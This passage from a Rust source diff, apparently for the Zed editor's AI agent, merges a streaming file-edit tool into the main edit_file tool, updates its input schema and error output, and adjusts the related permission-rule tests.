Content: {}", - file_content - ); - - // Verify the tool result was sent back to the model - let pending = fake_model.pending_completions(); - assert!( - !pending.is_empty(), - "Model should have been called with tool result" - ); - - let last_request = pending.last().unwrap(); - let has_tool_result = last_request.messages.iter().any(|m| { - m.content - .iter() - .any(|c| matches!(c, language_model::MessageContent::ToolResult(_))) - }); - assert!( - has_tool_result, - "Tool result should be in the messages sent back to the model" - ); - - // Complete the turn - fake_model.send_last_completion_stream_text_chunk("I've updated the greeting message."); - fake_model - .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::EndTurn)); - fake_model.end_last_completion_stream(); - cx.run_until_parked(); - - // Verify the thread completed successfully - thread.update(cx, |thread, _cx| { - assert!( - thread.is_turn_complete(), - "Thread should be complete after the turn ends" - ); - }); -} - -#[gpui::test] -async fn test_streaming_edit_json_parse_error_does_not_cause_unsaved_changes( - cx: &mut TestAppContext, -) { - super::init_test(cx); - super::always_allow_tools(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree( - path!("/project"), - json!({ - "src": { - "main.rs": "fn main() {\n println!(\"Hello, world!\");\n}\n" - } - }), - ) - .await; - - let project = project::Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let project_context = cx.new(|_cx| ProjectContext::default()); - let context_server_store = project.read_with(cx, |project, _| project.context_server_store()); - let context_server_registry = - cx.new(|cx| crate::ContextServerRegistry::new(context_server_store.clone(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - model.as_fake().set_supports_streaming_tools(true); - let fake_model = model.as_fake(); - - let thread = cx.new(|cx| { - let mut thread = crate::Thread::new( - project.clone(), 
- project_context, - context_server_registry, - crate::Templates::new(), - Some(model.clone()), - cx, - ); - let language_registry = project.read(cx).languages().clone(); - thread.add_tool(crate::StreamingEditFileTool::new( - project.clone(), - cx.weak_entity(), - thread.action_log().clone(), - language_registry, - )); - thread - }); - - let _events = thread - .update(cx, |thread, cx| { - thread.send( - UserMessageId::new(), - ["Write new content to src/main.rs"], - cx, - ) - }) - .unwrap(); - cx.run_until_parked(); - - let tool_use_id = "edit_1"; - let partial_1 = LanguageModelToolUse { - id: tool_use_id.into(), - name: EditFileTool::NAME.into(), - raw_input: json!({ - "display_description": "Rewrite main.rs", - "path": "project/src/main.rs", - "mode": "write" - }) - .to_string(), - input: json!({ - "display_description": "Rewrite main.rs", - "path": "project/src/main.rs", - "mode": "write" - }), - is_input_complete: false, - thought_signature: None, - }; - fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(partial_1)); - cx.run_until_parked(); - - let partial_2 = LanguageModelToolUse { - id: tool_use_id.into(), - name: EditFileTool::NAME.into(), - raw_input: json!({ - "display_description": "Rewrite main.rs", - "path": "project/src/main.rs", - "mode": "write", - "content": "fn main() { /* rewritten */ }" - }) - .to_string(), - input: json!({ - "display_description": "Rewrite main.rs", - "path": "project/src/main.rs", - "mode": "write", - "content": "fn main() { /* rewritten */ }" - }), - is_input_complete: false, - thought_signature: None, - }; - fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(partial_2)); - cx.run_until_parked(); - - // Now send a json parse error. At this point we have started writing content to the buffer. 
- fake_model.send_last_completion_stream_event( - LanguageModelCompletionEvent::ToolUseJsonParseError { - id: tool_use_id.into(), - tool_name: EditFileTool::NAME.into(), - raw_input: r#"{"display_description":"Rewrite main.rs","path":"project/src/main.rs","mode":"write","content":"fn main() { /* rewritten "#.into(), - json_parse_error: "EOF while parsing a string at line 1 column 95".into(), - }, - ); - fake_model - .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::ToolUse)); - fake_model.end_last_completion_stream(); - cx.run_until_parked(); - - // cx.executor().advance_clock(Duration::from_secs(5)); - // cx.run_until_parked(); - - assert!( - !fake_model.pending_completions().is_empty(), - "Thread should have retried after the error" - ); - - // Respond with a new, well-formed, complete edit_file tool use. - let tool_use = LanguageModelToolUse { - id: "edit_2".into(), - name: EditFileTool::NAME.into(), - raw_input: json!({ - "display_description": "Rewrite main.rs", - "path": "project/src/main.rs", - "mode": "write", - "content": "fn main() {\n println!(\"Hello, rewritten!\");\n}\n" - }) - .to_string(), - input: json!({ - "display_description": "Rewrite main.rs", - "path": "project/src/main.rs", - "mode": "write", - "content": "fn main() {\n println!(\"Hello, rewritten!\");\n}\n" - }), - is_input_complete: true, - thought_signature: None, - }; - fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(tool_use)); - fake_model - .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::ToolUse)); - fake_model.end_last_completion_stream(); - cx.run_until_parked(); - - let pending_completions = fake_model.pending_completions(); - assert!( - pending_completions.len() == 1, - "Expected only the follow-up completion containing the successful tool result" - ); - - let completion = pending_completions - .into_iter() - .last() - .expect("Expected a completion containing the tool result for 
edit_2"); - - let tool_result = completion - .messages - .iter() - .flat_map(|msg| &msg.content) - .find_map(|content| match content { - language_model::MessageContent::ToolResult(result) - if result.tool_use_id == language_model::LanguageModelToolUseId::from("edit_2") => - { - Some(result) - } - _ => None, - }) - .expect("Should have a tool result for edit_2"); - - // Ensure that the second tool call completed successfully and edits were applied. - assert!( - !tool_result.is_error, - "Tool result should succeed, got: {:?}", - tool_result - ); - let content_text = tool_result.text_contents(); - assert!( - !content_text.contains("file has been modified since you last read it"), - "Did not expect a stale last-read error, got: {content_text}" - ); - assert!( - !content_text.contains("This file has unsaved changes"), - "Did not expect an unsaved-changes error, got: {content_text}" - ); - - let file_content = fs - .load(path!("/project/src/main.rs").as_ref()) - .await - .expect("file should exist"); - super::assert_eq!( - file_content, - "fn main() {\n println!(\"Hello, rewritten!\");\n}\n", - "The second edit should be applied and saved gracefully" - ); - - fake_model.end_last_completion_stream(); - cx.run_until_parked(); -} diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index d9f451f135d6bf..513ffce0fa9ab0 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -53,7 +53,6 @@ use std::{ }; use util::path; -mod edit_file_thread_test; mod test_tools; use test_tools::*; @@ -6054,13 +6053,14 @@ async fn test_edit_file_tool_deny_rule_blocks_edit(cx: &mut TestAppContext) { cx, ) }); + let action_log = cx.update(|cx| thread.read(cx).action_log.clone()); #[allow(clippy::arc_with_non_send_sync)] let tool = Arc::new(crate::EditFileTool::new( project.clone(), thread.downgrade(), + action_log, language_registry, - templates, )); let (event_stream, _rx) = crate::ToolCallEventStream::test(); @@ -6070,6 +6070,8 @@ async fn 
test_edit_file_tool_deny_rule_blocks_edit(cx: &mut TestAppContext) { display_description: "Edit sensitive file".to_string(), path: "root/sensitive_config.txt".into(), mode: crate::EditFileMode::Edit, + content: None, + edits: Some(vec![]), }), event_stream, cx, @@ -6486,13 +6488,14 @@ async fn test_edit_file_tool_allow_rule_skips_confirmation(cx: &mut TestAppConte cx, ) }); + let action_log = thread.read_with(cx, |thread, _cx| thread.action_log().clone()); #[allow(clippy::arc_with_non_send_sync)] let tool = Arc::new(crate::EditFileTool::new( project, thread.downgrade(), + action_log, language_registry, - templates, )); let (event_stream, mut rx) = crate::ToolCallEventStream::test(); @@ -6502,6 +6505,8 @@ async fn test_edit_file_tool_allow_rule_skips_confirmation(cx: &mut TestAppConte display_description: "Edit README".to_string(), path: "root/README.md".into(), mode: crate::EditFileMode::Edit, + content: None, + edits: Some(vec![]), }), event_stream, cx, @@ -6554,13 +6559,14 @@ async fn test_edit_file_tool_allow_still_prompts_for_local_settings(cx: &mut Tes cx, ) }); + let action_log = thread.read_with(cx, |thread, _cx| thread.action_log().clone()); #[allow(clippy::arc_with_non_send_sync)] let tool = Arc::new(crate::EditFileTool::new( project, thread.downgrade(), + action_log, language_registry, - templates, )); // Editing a file inside .zed/ should still prompt even with global default: allow, @@ -6572,6 +6578,8 @@ async fn test_edit_file_tool_allow_still_prompts_for_local_settings(cx: &mut Tes display_description: "Edit local settings".to_string(), path: "root/.zed/settings.json".into(), mode: crate::EditFileMode::Edit, + content: None, + edits: Some(vec![]), }), event_stream, cx, diff --git a/crates/agent/src/thread.rs b/crates/agent/src/thread.rs index 7b3eab5d03f9f2..308bc843b1a4f5 100644 --- a/crates/agent/src/thread.rs +++ b/crates/agent/src/thread.rs @@ -2,9 +2,9 @@ use crate::{ ContextServerRegistry, CopyPathTool, CreateDirectoryTool, DbLanguageModel, 
DbThread, DeletePathTool, DiagnosticsTool, EditFileTool, FetchTool, FindPathTool, GrepTool, ListDirectoryTool, MovePathTool, NowTool, OpenTool, ProjectSnapshot, ReadFileTool, - RestoreFileFromDiskTool, SaveFileTool, SpawnAgentTool, StreamingEditFileTool, - SystemPromptTemplate, Template, Templates, TerminalTool, ToolPermissionDecision, - UpdatePlanTool, WebSearchTool, decide_permission_from_settings, + RestoreFileFromDiskTool, SaveFileTool, SpawnAgentTool, SystemPromptTemplate, Template, + Templates, TerminalTool, ToolPermissionDecision, UpdatePlanTool, WebSearchTool, + decide_permission_from_settings, }; use acp_thread::{MentionUri, UserMessageId}; use action_log::ActionLog; @@ -1544,12 +1544,6 @@ impl Thread { )); self.add_tool(DiagnosticsTool::new(self.project.clone())); self.add_tool(EditFileTool::new( - self.project.clone(), - cx.weak_entity(), - language_registry.clone(), - Templates::new(), - )); - self.add_tool(StreamingEditFileTool::new( self.project.clone(), cx.weak_entity(), self.action_log.clone(), @@ -2865,30 +2859,14 @@ impl Thread { } } - let use_streaming_edit_tool = model.supports_streaming_tools(); - let mut tools = self .tools .iter() .filter_map(|(tool_name, tool)| { - // For streaming_edit_file, check profile against "edit_file" since that's what users configure - let profile_tool_name = if tool_name == StreamingEditFileTool::NAME { - EditFileTool::NAME - } else { - tool_name.as_ref() - }; - if tool.supports_provider(&model.provider_id()) - && profile.is_tool_enabled(profile_tool_name) + && profile.is_tool_enabled(tool_name) { - match (tool_name.as_ref(), use_streaming_edit_tool) { - (StreamingEditFileTool::NAME, false) | (EditFileTool::NAME, true) => None, - (StreamingEditFileTool::NAME, true) => { - // Expose streaming tool as "edit_file" - Some((SharedString::from(EditFileTool::NAME), tool.clone())) - } - _ => Some((truncate(tool_name), tool.clone())), - } + Some((truncate(tool_name), tool.clone())) } else { None } diff --git 
a/crates/agent/src/tool_permissions.rs b/crates/agent/src/tool_permissions.rs index 2d3638265f758f..48ea6f9e6a6ca7 100644 --- a/crates/agent/src/tool_permissions.rs +++ b/crates/agent/src/tool_permissions.rs @@ -558,9 +558,9 @@ pub fn most_restrictive( #[cfg(test)] mod tests { use super::*; - use crate::AgentTool; use crate::pattern_extraction::extract_terminal_pattern; - use crate::tools::{DeletePathTool, EditFileTool, FetchTool, TerminalTool}; + use crate::tools::{DeletePathTool, FetchTool, TerminalTool}; + use crate::{AgentTool, EditFileTool}; use agent_settings::{AgentProfileId, CompiledRegex, InvalidRegexPattern, ToolRules}; use gpui::px; use settings::{DockPosition, NotifyWhenAgentWaiting, PlaySoundWhenAgentDone}; diff --git a/crates/agent/src/tools.rs b/crates/agent/src/tools.rs index f3a6ac7ec6d139..e9596d038faff2 100644 --- a/crates/agent/src/tools.rs +++ b/crates/agent/src/tools.rs @@ -17,7 +17,6 @@ mod read_file_tool; mod restore_file_from_disk_tool; mod save_file_tool; mod spawn_agent_tool; -mod streaming_edit_file_tool; mod terminal_tool; mod tool_edit_parser; mod tool_permissions; @@ -44,7 +43,6 @@ pub use read_file_tool::*; pub use restore_file_from_disk_tool::*; pub use save_file_tool::*; pub use spawn_agent_tool::*; -pub use streaming_edit_file_tool::*; pub use terminal_tool::*; pub use tool_permissions::*; pub use update_plan_tool::*; diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index 85c17c58e8f254..9d5f7953ffff96 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -1,29 +1,40 @@ +mod reindent; +mod streaming_fuzzy_matcher; + use super::restore_file_from_disk_tool::RestoreFileFromDiskTool; use super::save_file_tool::SaveFileTool; -use super::tool_permissions::authorize_file_edit; -use crate::{ - AgentTool, Templates, Thread, ToolCallEventStream, ToolInput, - edit_agent::{EditAgent, EditAgentOutputEvent, EditFormat}, +use 
super::tool_edit_parser::{ToolEditEvent, ToolEditParser}; +use crate::ToolInputPayload; +use crate::tools::edit_file_tool::{ + reindent::{Reindenter, compute_indent_delta}, + streaming_fuzzy_matcher::StreamingFuzzyMatcher, }; +use crate::{AgentTool, Thread, ToolCallEventStream, ToolInput}; use acp_thread::Diff; -use agent_client_protocol::schema as acp; -use anyhow::{Context as _, Result}; +use action_log::ActionLog; +use agent_client_protocol::schema::{self as acp, ToolCallLocation, ToolCallUpdateFields}; +use anyhow::Result; use collections::HashSet; -use futures::{FutureExt as _, StreamExt as _}; +use futures::FutureExt as _; use gpui::{App, AppContext, AsyncApp, Entity, Task, WeakEntity}; -use indoc::formatdoc; use language::language_settings::{self, FormatOnSave}; -use language::{LanguageRegistry, ToPoint}; -use language_model::{CompletionIntent, LanguageModelToolResultContent}; +use language::{Buffer, LanguageRegistry}; +use language_model::LanguageModelToolResultContent; use project::lsp_store::{FormatTrigger, LspFormatTarget}; -use project::{Project, ProjectPath}; +use project::{AgentLocation, Project, ProjectPath}; use schemars::JsonSchema; -use serde::{Deserialize, Serialize}; +use serde::{ + Deserialize, Deserializer, Serialize, + de::{DeserializeOwned, Error as _}, +}; +use std::ops::Range; use std::path::PathBuf; use std::sync::Arc; +use streaming_diff::{CharOperation, StreamingDiff}; +use text::ToOffset; use ui::SharedString; -use util::ResultExt; use util::rel_path::RelPath; +use util::{Deferred, ResultExt}; const DEFAULT_UI_TEXT: &str = "Editing file"; @@ -37,7 +48,7 @@ const DEFAULT_UI_TEXT: &str = "Editing file"; /// - Use the `list_directory` tool to verify the parent directory exists and is the correct location #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] pub struct EditFileToolInput { - /// A one-line, user-friendly markdown description of the edit. 
This will be shown in the UI and also passed to another model to perform the edit. + /// A one-line, user-friendly markdown description of the edit. This will be shown in the UI. /// /// Be terse, but also descriptive in what you want to achieve with this edit. Avoid generic instructions. /// @@ -67,30 +78,96 @@ pub struct EditFileToolInput { /// `frontend/db.js` /// pub path: PathBuf, + /// The mode of operation on the file. Possible values: - /// - 'edit': Make granular edits to an existing file. - /// - 'create': Create a new file if it doesn't exist. - /// - 'overwrite': Replace the entire contents of an existing file. + /// - 'write': Replace the entire contents of the file. If the file doesn't exist, it will be created. Requires 'content' field. + /// - 'edit': Make granular edits to an existing file. Requires 'edits' field. /// /// When a file already exists or you just created it, prefer editing it as opposed to recreating it from scratch. + #[serde(deserialize_with = "deserialize_maybe_stringified")] pub mode: EditFileMode, + + /// The complete content for the new file (required for 'write' mode). + /// This field should contain the entire file content. + #[serde(default, skip_serializing_if = "Option::is_none")] + pub content: Option, + + /// List of edit operations to apply sequentially (required for 'edit' mode). + /// Each edit finds `old_text` in the file and replaces it with `new_text`. + #[serde( + default, + skip_serializing_if = "Option::is_none", + deserialize_with = "deserialize_maybe_stringified" + )] + pub edits: Option>, +} + +#[derive(Clone, Copy, Debug, Serialize, Deserialize, JsonSchema)] +#[serde(rename_all = "snake_case")] +pub enum EditFileMode { + /// Overwrite the file with new content (replacing any existing content). + /// If the file does not exist, it will be created. 
+ Write, + /// Make granular edits to an existing file + Edit, } +/// A single edit operation that replaces old text with new text +/// Properly escape all text fields as valid JSON strings. +/// Remember to escape special characters like newlines (`\n`) and quotes (`"`) in JSON strings. #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +pub struct Edit { + /// The exact text to find in the file. This will be matched using fuzzy matching + /// to handle minor differences in whitespace or formatting. + /// + /// Be minimal with replacements: + /// - For unique lines, include only those lines + /// - For non-unique lines, include enough context to identify them + pub old_text: String, + /// The text to replace it with + pub new_text: String, +} + +#[derive(Clone, Default, Debug, Deserialize)] struct EditFileToolPartialInput { #[serde(default)] - path: String, + display_description: Option, + #[serde(default)] + path: Option, + #[serde(default, deserialize_with = "deserialize_maybe_stringified")] + mode: Option, #[serde(default)] - display_description: String, + content: Option, + #[serde(default, deserialize_with = "deserialize_maybe_stringified")] + edits: Option>, } -#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] -#[serde(rename_all = "lowercase")] -#[schemars(inline)] -pub enum EditFileMode { - Edit, - Create, - Overwrite, +#[derive(Clone, Default, Debug, Deserialize)] +pub struct PartialEdit { + #[serde(default)] + pub old_text: Option, + #[serde(default)] + pub new_text: Option, +} + +#[derive(Deserialize)] +#[serde(untagged)] +enum ValueOrJsonString { + Value(T), + String(String), +} + +fn deserialize_maybe_stringified<'de, T, D>(deserializer: D) -> Result +where + T: DeserializeOwned, + D: Deserializer<'de>, +{ + match ValueOrJsonString::::deserialize(deserializer)? 
{ + ValueOrJsonString::Value(value) => Ok(value), + ValueOrJsonString::String(string) => serde_json::from_str::(&string).map_err(|error| { + D::Error::custom(format!("failed to parse stringified value: {error}")) + }), + } } #[derive(Debug, Serialize, Deserialize)] @@ -106,9 +183,23 @@ pub enum EditFileToolOutput { }, Error { error: String, + #[serde(default, skip_serializing_if = "Option::is_none")] + input_path: Option, + #[serde(default, skip_serializing_if = "String::is_empty")] + diff: String, }, } +impl EditFileToolOutput { + pub fn error(error: impl Into) -> Self { + Self::Error { + error: error.into(), + input_path: None, + diff: String::new(), + } + } +} + impl std::fmt::Display for EditFileToolOutput { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { @@ -125,7 +216,24 @@ impl std::fmt::Display for EditFileToolOutput { ) } } - EditFileToolOutput::Error { error } => write!(f, "{error}"), + EditFileToolOutput::Error { + error, + diff, + input_path, + } => { + write!(f, "{error}\n")?; + if let Some(input_path) = input_path + && !diff.is_empty() + { + write!( + f, + "Edited {}:\n\n```diff\n{diff}\n```", + input_path.display() + ) + } else { + write!(f, "No edits were made.") + } + } } } } @@ -137,42 +245,215 @@ impl From for LanguageModelToolResultContent { } pub struct EditFileTool { + project: Entity, thread: WeakEntity, + action_log: Entity, language_registry: Arc, - project: Entity, - templates: Arc, +} + +enum EditSessionResult { + Completed(EditSession), + Failed { + error: String, + session: Option, + }, } impl EditFileTool { pub fn new( project: Entity, thread: WeakEntity, + action_log: Entity, language_registry: Arc, - templates: Arc, ) -> Self { Self { project, thread, + action_log, language_registry, - templates, } } fn authorize( &self, - input: &EditFileToolInput, + path: &PathBuf, + description: &str, event_stream: &ToolCallEventStream, cx: &mut App, ) -> Task> { - authorize_file_edit( - Self::NAME, - &input.path, 
- &input.display_description, + super::tool_permissions::authorize_file_edit( + EditFileTool::NAME, + path, + description, &self.thread, event_stream, cx, ) } + + fn set_agent_location(&self, buffer: WeakEntity, position: text::Anchor, cx: &mut App) { + let should_update_agent_location = self + .thread + .read_with(cx, |thread, _cx| !thread.is_subagent()) + .unwrap_or_default(); + if should_update_agent_location { + self.project.update(cx, |project, cx| { + project.set_agent_location(Some(AgentLocation { buffer, position }), cx); + }); + } + } + + async fn ensure_buffer_saved(&self, buffer: &Entity, cx: &mut AsyncApp) { + let format_on_save_enabled = buffer.read_with(cx, |buffer, cx| { + let settings = language_settings::LanguageSettings::for_buffer(buffer, cx); + settings.format_on_save != FormatOnSave::Off + }); + + if format_on_save_enabled { + self.project + .update(cx, |project, cx| { + project.format( + HashSet::from_iter([buffer.clone()]), + LspFormatTarget::Buffers, + false, + FormatTrigger::Save, + cx, + ) + }) + .await + .log_err(); + } + + self.project + .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) + .await + .log_err(); + + self.action_log.update(cx, |log, cx| { + log.buffer_edited(buffer.clone(), cx); + }); + } + + async fn process_streaming_edits( + &self, + input: &mut ToolInput, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> EditSessionResult { + let mut session: Option = None; + let mut last_partial: Option = None; + + loop { + futures::select! 
{ + payload = input.next().fuse() => { + match payload { + Ok(payload) => match payload { + ToolInputPayload::Partial(partial) => { + if let Ok(parsed) = serde_json::from_value::(partial) { + let path_complete = parsed.path.is_some() + && parsed.path.as_ref() == last_partial.as_ref().and_then(|partial| partial.path.as_ref()); + + last_partial = Some(parsed.clone()); + + if session.is_none() + && path_complete + && let EditFileToolPartialInput { + path: Some(path), + display_description: Some(display_description), + mode: Some(mode), + .. + } = &parsed + { + match EditSession::new( + PathBuf::from(path), + display_description, + *mode, + self, + event_stream, + cx, + ) + .await + { + Ok(created_session) => session = Some(created_session), + Err(error) => { + log::error!("Failed to create edit session: {}", error); + return EditSessionResult::Failed { + error, + session: None, + }; + } + } + } + + if let Some(current_session) = &mut session + && let Err(error) = current_session.process(parsed, self, event_stream, cx) + { + log::error!("Failed to process edit: {}", error); + return EditSessionResult::Failed { error, session }; + } + } + } + ToolInputPayload::Full(full_input) => { + let mut session = if let Some(session) = session { + session + } else { + match EditSession::new( + full_input.path.clone(), + &full_input.display_description, + full_input.mode, + self, + event_stream, + cx, + ) + .await + { + Ok(created_session) => created_session, + Err(error) => { + log::error!("Failed to create edit session: {}", error); + return EditSessionResult::Failed { + error, + session: None, + }; + } + } + }; + + return match session.finalize(full_input, self, event_stream, cx).await { + Ok(()) => EditSessionResult::Completed(session), + Err(error) => { + log::error!("Failed to finalize edit: {}", error); + EditSessionResult::Failed { + error, + session: Some(session), + } + } + }; + } + ToolInputPayload::InvalidJson { error_message } => { + log::error!("Received invalid JSON: 
{error_message}"); + return EditSessionResult::Failed { + error: error_message, + session, + }; + } + }, + Err(error) => { + return EditSessionResult::Failed { + error: format!("Failed to receive tool input: {error}"), + session, + }; + } + } + } + _ = event_stream.cancelled_by_user().fuse() => { + return EditSessionResult::Failed { + error: "Edit cancelled by user".to_string(), + session, + }; + } + } + } + } } impl AgentTool for EditFileTool { @@ -181,6 +462,10 @@ impl AgentTool for EditFileTool { const NAME: &'static str = "edit_file"; + fn supports_input_streaming() -> bool { + true + } + fn kind() -> acp::ToolKind { acp::ToolKind::Edit } @@ -203,25 +488,25 @@ impl AgentTool for EditFileTool { .unwrap_or(input.path.to_string_lossy().into_owned()) .into(), Err(raw_input) => { - if let Some(input) = - serde_json::from_value::(raw_input).ok() - { - let path = input.path.trim(); + if let Ok(input) = serde_json::from_value::(raw_input) { + let path = input.path.unwrap_or_default(); + let path = path.trim(); if !path.is_empty() { return self .project .read(cx) - .find_project_path(&input.path, cx) + .find_project_path(&path, cx) .and_then(|project_path| { self.project .read(cx) .short_full_path_for_project_path(&project_path, cx) }) - .unwrap_or(input.path) + .unwrap_or_else(|| path.to_string()) .into(); } - let description = input.display_description.trim(); + let description = input.display_description.unwrap_or_default(); + let description = description.trim(); if !description.is_empty() { return description.to_string().into(); } @@ -234,275 +519,46 @@ impl AgentTool for EditFileTool { fn run( self: Arc, - input: ToolInput, + mut input: ToolInput, event_stream: ToolCallEventStream, cx: &mut App, ) -> Task> { cx.spawn(async move |cx: &mut AsyncApp| { - let input = input.recv().await.map_err(|e| EditFileToolOutput::Error { - error: format!("Failed to receive tool input: {e}"), - })?; - - let project = self - .thread - .read_with(cx, |thread, _cx| 
thread.project().clone()) - .map_err(|_| EditFileToolOutput::Error { - error: "thread was dropped".to_string(), - })?; - - let (project_path, abs_path, allow_thinking, update_agent_location, authorize) = - cx.update(|cx| { - let project_path = resolve_path(&input, project.clone(), cx).map_err(|err| { - EditFileToolOutput::Error { - error: err.to_string(), - } - })?; - let abs_path = project.read(cx).absolute_path(&project_path, cx); - if let Some(abs_path) = abs_path.clone() { - event_stream.update_fields( - acp::ToolCallUpdateFields::new() - .locations(vec![acp::ToolCallLocation::new(abs_path)]), - ); - } - let allow_thinking = self - .thread - .read_with(cx, |thread, _cx| thread.thinking_enabled()) - .unwrap_or(true); - - let update_agent_location = self.thread.read_with(cx, |thread, _cx| !thread.is_subagent()).unwrap_or_default(); - - let authorize = self.authorize(&input, &event_stream, cx); - Ok::<_, EditFileToolOutput>((project_path, abs_path, allow_thinking, update_agent_location, authorize)) - })?; - - let result: anyhow::Result = async { - authorize.await?; - - let (request, model, action_log) = self.thread.update(cx, |thread, cx| { - let request = thread.build_completion_request(CompletionIntent::ToolResults, cx); - (request, thread.model().cloned(), thread.action_log().clone()) - })?; - let request = request?; - let model = model.context("No language model configured")?; - - let edit_format = EditFormat::from_model(model.clone())?; - let edit_agent = EditAgent::new( - model, - project.clone(), - action_log.clone(), - self.templates.clone(), - edit_format, - allow_thinking, - update_agent_location, - ); - - let buffer = project - .update(cx, |project, cx| { - project.open_buffer(project_path.clone(), cx) - }) - .await?; - - // Check if the file has been modified since the agent last read it - if let Some(abs_path) = abs_path.as_ref() { - let last_read_mtime = action_log.read_with(cx, |log, _| log.file_read_time(abs_path)); - let (current_mtime, is_dirty, 
has_save_tool, has_restore_tool) = self.thread.read_with(cx, |thread, cx| { - let current = buffer.read(cx).file().and_then(|file| file.disk_state().mtime()); - let dirty = buffer.read(cx).is_dirty(); - let has_save = thread.has_tool(SaveFileTool::NAME); - let has_restore = thread.has_tool(RestoreFileFromDiskTool::NAME); - (current, dirty, has_save, has_restore) - })?; - - // Check for unsaved changes first - these indicate modifications we don't know about - if is_dirty { - let message = match (has_save_tool, has_restore_tool) { - (true, true) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ - If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." - } - (true, false) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ - If they want to discard them, ask the user to manually revert the file, then inform you when it's ok to proceed." - } - (false, true) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask the user to manually save the file, then inform you when it's ok to proceed. \ - If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." - } - (false, false) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes, \ - then ask them to save or revert the file manually and inform you when it's ok to proceed." 
- } - }; - anyhow::bail!("{}", message); - } - - // Check if the file was modified on disk since we last read it - if let (Some(last_read), Some(current)) = (last_read_mtime, current_mtime) { - // MTime can be unreliable for comparisons, so our newtype intentionally - // doesn't support comparing them. If the mtime at all different - // (which could be because of a modification or because e.g. system clock changed), - // we pessimistically assume it was modified. - if current != last_read { - anyhow::bail!( - "The file {} has been modified since you last read it. \ - Please read the file again to get the current state before editing it.", - input.path.display() - ); - } - } - } - - let diff = cx.new(|cx| Diff::new(buffer.clone(), cx)); - event_stream.update_diff(diff.clone()); - let _finalize_diff = util::defer({ - let diff = diff.downgrade(); - let mut cx = cx.clone(); - move || { - diff.update(&mut cx, |diff, cx| diff.finalize(cx)).ok(); - } - }); - - let old_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - let old_text = cx - .background_spawn({ - let old_snapshot = old_snapshot.clone(); - async move { Arc::new(old_snapshot.text()) } + match self + .process_streaming_edits(&mut input, &event_stream, cx) + .await + { + EditSessionResult::Completed(session) => { + self.ensure_buffer_saved(&session.buffer, cx).await; + let (new_text, diff) = session.compute_new_text_and_diff(cx).await; + Ok(EditFileToolOutput::Success { + old_text: session.old_text.clone(), + new_text, + input_path: session.input_path, + diff, }) - .await; - - let (output, mut events) = if matches!(input.mode, EditFileMode::Edit) { - edit_agent.edit( - buffer.clone(), - input.display_description.clone(), - &request, - cx, - ) - } else { - edit_agent.overwrite( - buffer.clone(), - input.display_description.clone(), - &request, - cx, - ) - }; - - let mut hallucinated_old_text = false; - let mut ambiguous_ranges = Vec::new(); - let mut emitted_location = false; - loop { - let event 
= futures::select! { - event = events.next().fuse() => match event { - Some(event) => event, - None => break, - }, - _ = event_stream.cancelled_by_user().fuse() => { - anyhow::bail!("Edit cancelled by user"); - } - }; - match event { - EditAgentOutputEvent::Edited(range) => { - if !emitted_location { - let line = Some(buffer.update(cx, |buffer, _cx| { - range.start.to_point(&buffer.snapshot()).row - })); - if let Some(abs_path) = abs_path.clone() { - event_stream.update_fields(acp::ToolCallUpdateFields::new().locations(vec![acp::ToolCallLocation::new(abs_path).line(line)])); - } - emitted_location = true; - } - }, - EditAgentOutputEvent::UnresolvedEditRange => hallucinated_old_text = true, - EditAgentOutputEvent::AmbiguousEditRange(ranges) => ambiguous_ranges = ranges, - EditAgentOutputEvent::ResolvingEditRange(range) => { - diff.update(cx, |card, cx| card.reveal_range(range.clone(), cx)); - } - } - } - - output.await?; - - let format_on_save_enabled = buffer.read_with(cx, |buffer, cx| { - let settings = language_settings::LanguageSettings::for_buffer(buffer, cx); - settings.format_on_save != FormatOnSave::Off - }); - - if format_on_save_enabled { - action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); - - let format_task = project.update(cx, |project, cx| { - project.format( - HashSet::from_iter([buffer.clone()]), - LspFormatTarget::Buffers, - false, // Don't push to history since the tool did it. 
